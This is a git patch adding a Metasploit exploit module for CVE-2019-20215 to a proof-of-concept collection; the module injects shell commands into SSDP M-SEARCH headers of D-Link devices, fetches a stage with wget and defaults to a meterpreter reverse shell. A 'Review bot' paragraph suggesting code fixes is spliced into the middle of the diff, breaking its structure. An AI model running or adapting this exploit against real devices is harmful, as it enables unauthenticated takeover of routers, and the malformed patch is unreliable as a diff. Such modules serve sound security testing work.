From 7f43d54912fa771779317b829f68704ed97af826 Mon Sep 17 00:00:00 2001
From: mr-xn
Date: Wed, 12 Feb 2020 13:40:32 +0800
Subject: [PATCH] add D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215
---
 ... in ssdpcgi (Metasploit) CVE-2019-20215.rb | 76 +++++++++++++++++++
 README.md | 1 +
 2 files changed, 77 insertions(+)
 create mode 100644 POC_Details/D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit) CVE-2019-20215.rb
diff --git a/POC_Details/D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit) CVE-2019-20215.rb b/POC_Details/D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit) CVE-2019-20215.rb
new file mode 100644
index 00000000..f989c9aa
--- /dev/null
+++ b/POC_Details/D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit) CVE-2019-20215.rb
@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Udp
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
+ 'Description' => %q{
+ D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
+ },
+ 'Author' =>
+ [
+ 's1kr10s',
+ 'secenv'
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2019-20215'],
+ ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
+ ],
+ 'DisclosureDate' => 'Dec 24 2019',
+ 'Privileged' => true,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE,
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
+ 'CMDSTAGER::FLAVOR' => 'wget',
+ 'RPORT' => '1900'
+ },
+ 'Targets' =>
+ [
+ [ 'Auto', { } ],
+ ],
+ 'CmdStagerFlavor' => %w{ echo wget },
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
+ ])
+ end
+
+ def exploit
+ execute_cmdstager(linemax: 1500)
+ end
+
+ def execute_command(cmd, opts)
+ type = datastore['VECTOR']
+ if type == "URN"
+ print_status("Target Payload URN")
+ val = "urn:device:1;`#{cmd}`"
+ else
+ print_status("Target Payload UUID")
+ val = "uuid:`#{cmd}`"
+ end
+
+ connect_udp
+ header = "M-SEARCH * HTTP/1.1\r\n"
+ header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
+ header << "ST:#{val}\r\n"
+ header << "Man:\"ssdp:discover\"\r\n"
+ header << "MX:2\r\n\r\n"
+ udp_sock.put(header)
+ disconnect_udp
+ end
+end
\ No newline at end of file
diff --git a/README.md b/README.md
index 300955e6..be7ec1ea 100644
--- a/README.md
+++ b/README.md
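Review bot: `disconnect_udp` at the end of `execute_command` is skipped whenever `udp_sock.put(header)` raises after `connect_udp` has succeeded, so the socket is not released on the error path (and the cmdstager presumably calls `execute_command` more than once, so this can repeat); move the teardown into an `ensure` clause, `begin; udp_sock.put(header); ensure; disconnect_udp; end`. The `opts` parameter of `execute_command` is never read; since the signature is dictated by `Msf::Exploit::CmdStager` it cannot be dropped, but it should be named `_opts` per Ruby convention. The `'Description'` value merely repeats `'Name'`; a module description conventionally states the affected component and the firmware/versions covered by the referenced advisory, so that defenders can map the module to an affected-device list. The file is added without `# frozen_string_literal: true`; if that magic comment is later introduced, `header << ...` on a string literal will raise a `FrozenError`, so `header` should then be built with `String.new` or a heredoc rather than `<<` on a literal.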
@@ -22,6 +22,7 @@ - [D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)](https://github.com/s1kr10s/D-Link-DIR-859-RCE) - [小米系列路由器远程命令执行漏洞(CVE-2019-18370,CVE-2019-18371)](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC) - [Huawei HG255 Directory Traversal[目录穿越]](https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt)|[本地备份文件](./tools/huaweihg255-traversal.rb) +- [D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215](./POC_Details/D-Link%20Devices%20-%20Unauthenticated%20Remote%20Command%20Execution%20in%20ssdpcgi%20(Metasploit)%20CVE-2019-20215.rb) ## Web APP